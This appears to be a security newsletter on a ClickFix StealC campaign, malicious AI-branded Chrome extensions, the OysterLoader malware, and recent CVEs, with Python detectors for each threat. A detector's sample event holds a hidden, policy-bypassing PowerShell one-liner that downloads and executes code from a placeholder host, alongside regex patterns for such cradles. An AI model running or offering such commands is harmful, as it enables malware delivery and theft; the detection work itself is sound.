TRENDING TOPICS FEB 13, 2026

Update: ClickFix CAPTCHA Lures Deliver Fileless StealC Credential-Stealing Chain

Security researchers uncovered a ClickFix social engineering campaign that uses fake CAPTCHA prompts to trick Windows users into executing malicious PowerShell commands, ultimately deploying the StealC information stealer. The attack begins when a user visits a compromised website, which loads a malicious script and displays a Cloudflare-style verification page instructing the victim to paste and run a command from their clipboard. That command launches a multi-stage, fileless infection chain that downloads shellcode, reflectively loads a PE downloader, and injects the final StealC payload into a legitimate Windows process such as svchost[.]exe. StealC then harvests browser credentials, cryptocurrency wallets, email accounts, system information, and screenshots before exfiltrating the data over RC4-encrypted HTTP traffic. The malware operates without persistence, executes largely in memory, and deletes itself after completing data theft, reducing forensic artifacts and complicating detection. By leveraging reflective loading, process injection, and encrypted command-and-control communications, the infection chain bypasses many disk-based and signature-based security controls. StealC’s modular architecture allows it to target multiple data sources, including Chromium and Firefox browsers, cryptocurrency wallets, Steam accounts, and Outlook credentials, making it especially dangerous for both enterprise and personal systems. Telemetry from multiple campaigns shows frequent rotation of domains, loader scripts, and PowerShell command structures, indicating an affiliate-driven distribution model rather than a single operator. The use of clipboard-based execution also reduces the need for exploit kits or malicious attachments, allowing the campaign to bypass many email and web filtering controls that rely on file reputation. 
The use of clipboard-based commands and CAPTCHA pages that look trusted also removes the need for traditional malware downloads, shifting the final execution step to the user. Organizations should prioritize user awareness around fake verification prompts, restrict PowerShell execution where possible, and deploy behavioral monitoring to detect fileless activity, process injection, and unusual credential access patterns.
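The behavioral monitoring the paragraph above calls for can start with simple process-lineage and command-line heuristics. This is an added example with constructed events and a placeholder URL, not code from the researchers' report; it scores PowerShell launches that look like the clipboard-pasted ClickFix stage (explorer.exe parent, download cradle, in-memory execution, hidden window):

```python
"""Heuristic triage of process-creation events for the ClickFix PowerShell stage.
Added example with constructed events; not code from the researchers' report."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # child process image name, e.g. powershell.exe
    parent_image: str   # parent process image name
    command_line: str   # full command line as logged by the EDR or Sysmon


POWERSHELL = {"powershell.exe", "pwsh.exe"}
# The Win+R "paste and run" path is hosted by explorer.exe, not by a script host.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Traits of a one-line fileless cradle: fetch, run in memory, stay hidden.
INDICATORS = [
    ("download-cradle", re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient|\b(?:iwr|irm|curl)\b", re.I)),
    ("in-memory-exec", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("hidden-window", re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)),
    ("policy-bypass", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
    ("encoded-command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
]


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); each matched trait adds one point."""
    reasons: list[str] = []
    if ev.image.lower() not in POWERSHELL:
        return 0, reasons
    if ev.parent_image.lower() in INTERACTIVE_PARENTS:
        reasons.append("powershell-from-explorer")
    for name, rx in INDICATORS:
        if rx.search(ev.command_line):
            reasons.append(name)
    return len(reasons), reasons


def flag_events(events, threshold: int = 3) -> list[ProcEvent]:
    """Events at or above the threshold are worth an analyst's look."""
    return [ev for ev in events if score_event(ev)[0] >= threshold]


# Constructed sample events: one ClickFix-style launch, two benign ones.
SAMPLE_EVENTS = [
    ProcEvent("powershell.exe", "explorer.exe",
              "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('https://placeholder.invalid/x')\""),
    ProcEvent("powershell.exe", "cmd.exe", r"powershell -File C:\scripts\backup.ps1"),
    ProcEvent("notepad.exe", "explorer.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for ev in flag_events(SAMPLE_EVENTS):
        print(ev.parent_image, "->", ev.image, score_event(ev))
```

Tune the threshold to your environment; administrators who legitimately paste one-liners into the Run dialog will still score on the parent check alone, which is why no single trait is enough.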

“AiFrame” Campaign Uses Fake AI Assistant Extensions to Harvest Browser and Gmail Data

Researchers at LayerX Security uncovered a coordinated campaign involving at least 30 malicious Chrome extensions posing as AI assistants for chat, summarization, writing, and Gmail support, impacting more than 260,000 users. Although the extensions appeared legitimate and even received featured placement in the Chrome Web Store, they shared the same codebase, permissions, and backend infrastructure, indicating a single coordinated operation. Instead of implementing AI functionality locally, the extensions injected full-screen remote iframes that loaded interfaces from attacker-controlled servers, allowing operators to silently change behavior without store updates or user prompts. Through this architecture, the extensions acted as privileged proxies, extracting page content, metadata, and other sensitive data from active browser tabs and transmitting it to external infrastructure. This meant operators could dynamically introduce new data collection logic or surveillance features long after the extension was installed. A subset of the extensions specifically targeted Gmail, injecting scripts that read visible email threads and draft content directly from the browser’s DOM before sending that data off-device to attacker-controlled servers. The campaign relied on “extension spraying” tactics, where identical extensions were republished under new names and IDs after takedowns to maintain persistence and reputation in the store. All variants communicated with infrastructure under the tapnetic[.]pro domain, using themed subdomains to match the impersonated AI brand and reduce the impact of blocking a single endpoint. This design effectively turned the extensions into remote-controlled surveillance tools that could evolve after installation and bypass traditional review processes.
Because the extensions relied on remote-loading interfaces, operators could push entirely new functionality or data-collection routines without triggering Chrome Web Store update reviews, effectively turning the extensions into persistent remote-access channels inside the browser. This model also enables rapid infrastructure rotation, making traditional block-list and signature-based extension detection less effective over time. Organizations should audit installed browser extensions, restrict high-risk permissions, and remove any AI-branded tools that rely on remote-hosted interfaces or unknown backend services.
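The audit recommended above can be done statically from an extension's manifest and script sources. This is an added example with constructed input, not LayerX's tooling; it flags the combination the campaign relied on: broad host access or a Gmail content script together with an iframe whose source is a remote origin (the origin names below are placeholders):

```python
"""Static audit of a Chrome extension (manifest plus script sources) for the
remote-iframe pattern described above. Added example with constructed input;
not LayerX's tooling."""
import re

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
HIGH_RISK_PERMS = {"tabs", "scripting", "webRequest", "cookies", "clipboardRead"}
WEBMAIL_HOSTS = ("mail.google.com",)
IFRAME_RX = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)|<iframe", re.I)
REMOTE_HOST_RX = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def audit_extension(manifest: dict, sources: dict) -> list[tuple[str, str]]:
    """Return (finding, detail) pairs; an empty list means nothing was flagged."""
    findings = []
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", [])) | perms
    for h in sorted(hosts & BROAD_HOSTS):
        findings.append(("broad-host-permission", h))
    for p in sorted(perms & HIGH_RISK_PERMS):
        findings.append(("high-risk-permission", p))
    for cs in manifest.get("content_scripts", []):
        for pattern in cs.get("matches", []):
            if any(host in pattern for host in WEBMAIL_HOSTS):
                findings.append(("webmail-content-script", pattern))
    for fname, src in sources.items():
        if IFRAME_RX.search(src):  # only report origins from files that build iframes
            for host in sorted(set(REMOTE_HOST_RX.findall(src))):
                findings.append(("remote-iframe-origin", f"{fname}: {host}"))
    return findings


def is_remote_proxy(findings) -> bool:
    """Remote UI combined with broad page access is the AiFrame shape."""
    kinds = {kind for kind, _ in findings}
    return "remote-iframe-origin" in kinds and bool(
        kinds & {"broad-host-permission", "webmail-content-script"})


# Constructed samples: an AiFrame-like extension and a benign one.
AI_MANIFEST = {
    "manifest_version": 3, "name": "AI Chat Assistant",
    "permissions": ["tabs", "scripting", "storage"], "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["https://mail.google.com/*"], "js": ["gmail.js"]}],
}
AI_SOURCES = {"gmail.js": "const f=document.createElement('iframe');"
              "f.src='https://assistant.placeholder.invalid/ui';document.body.appendChild(f);"}
BENIGN_MANIFEST = {"manifest_version": 3, "name": "Tab Counter", "permissions": ["storage"]}
BENIGN_SOURCES = {"bg.js": "chrome.tabs.onCreated.addListener(() => {});"}
```

On a real workstation, load each unpacked extension directory's manifest.json and its JavaScript files into the two arguments; a remote origin that is not the vendor's own domain is the detail to investigate.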

Update: OysterLoader Multi-Stage Loader Linked to Rhysida Ransomware Campaigns

OysterLoader, also known as Broomstick or CleanUp, is a multi-stage C++ malware loader used in campaigns tied to the Rhysida ransomware group and other commodity malware operations. The threat is commonly distributed through fake software download sites that impersonate trusted IT tools such as PuTTY, WinSCP, or authentication utilities, often delivering a signed MSI installer to appear legitimate. Once executed, the infection chain progresses through four stages, including a packer with anti-debugging traps, custom shellcode using modified LZMA compression, and a downloader that retrieves additional payloads from command-and-control infrastructure. The loader employs techniques such as API hammering, dynamic API hashing, steganographic payload delivery, and custom Base64 encoding to evade static detection and network monitoring. These layered techniques allow the malware to remain difficult to analyze while maintaining reliable delivery of follow-on payloads. In later stages, the malware performs environment checks, establishes persistence through scheduled tasks, and communicates with multiple hardcoded C2 servers using disguised HTTP traffic. The final stage exfiltrates system information, retrieves additional payloads, and can deliver infostealers like Vidar or facilitate ransomware deployment. Its evolving infrastructure, multi-tiered C2 design, and custom data encoding mechanisms indicate an actively maintained toolset with ongoing development. Analysis of recent samples shows frequent changes to command-and-control endpoints and encoding schemes, suggesting active development and operational use across multiple campaigns rather than a single deployment. Its role as a flexible delivery mechanism means it can be repurposed to drop different payload families, making early-stage detection critical to preventing downstream ransomware or credential-theft incidents. 
The loader’s use of fake software installers and legitimate-looking infrastructure makes it particularly effective in enterprise environments where users routinely download IT tools. Organizations should restrict software installation sources, monitor for suspicious scheduled tasks or abnormal HTTP beaconing, and deploy behavioral detection controls capable of identifying multi-stage loader activity before ransomware or secondary malware is deployed.

Top CVEs of the Week

Top CVEs of the Week – As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.

Priority CVEs

Critical Severity (1 CVE)

CVE-2026-1731 – BeyondTrust Remote Support & PRA
Tags: Pre-Auth RCE | BeyondTrust | Patch Immediately
Critical pre-auth remote code execution in BeyondTrust Remote Support and legacy Privileged Remote Access lets unauthenticated attackers send crafted requests that run OS commands as the site user; patch self-hosted appliances immediately, remove unnecessary internet exposure, and enable tight monitoring for abnormal pre-auth traffic.

High Severity (2 CVEs)

CVE-2026-20700 – Apple Platforms (dyld)
Tags: Memory Corruption | Apple Ecosystem | Targeted Exploitation
Memory corruption in Apple’s dyld component allows an attacker with memory write access to achieve arbitrary code execution on iOS, iPadOS, macOS, watchOS, tvOS, and visionOS; prioritize deploying the latest Apple security updates to high-risk users and ensure rapid compliance on all affected devices.

CVE-2026-20841 – Windows Notepad (Markdown)
Tags: Command Injection | Windows Notepad | User Interaction
Command-injection flaw in the modern Windows Notepad Markdown feature lets attackers craft .md files whose links launch untrusted protocols and load remote code under the user’s context; deploy February 2026 Microsoft patches, restrict risky protocol handlers, and enforce least-privilege user accounts to contain potential abuse.
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.